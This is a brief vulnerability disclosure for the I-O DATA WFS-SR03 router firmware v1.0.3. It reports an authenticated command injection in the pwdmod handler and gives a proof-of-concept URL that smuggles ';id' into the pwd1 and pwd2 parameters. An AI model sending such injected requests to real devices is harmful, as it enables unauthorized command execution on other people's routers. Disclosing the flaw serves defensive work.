IoData:WFS-SR03 v1.0.3(2022/11/14)
https://www.iodata.jp/lib/software/w/2176.htm
The port where the ioos program is located is 81, which is the interface for the router's processing functions.
sys_smb_pwdmod function parameter controllable in IOS, resulting in arbitrary command injection
Parameters are obtained from http parameters, the cgi_sys_pwdmod_handler of the function belongs, and the function name when the url is called pwdmod
poc:
need to authorize
<http://127.0.0.1/protocol.csp?fname=system&opt=pwdmod&name=root&pwd1=;id&pwd2=;id&function=set>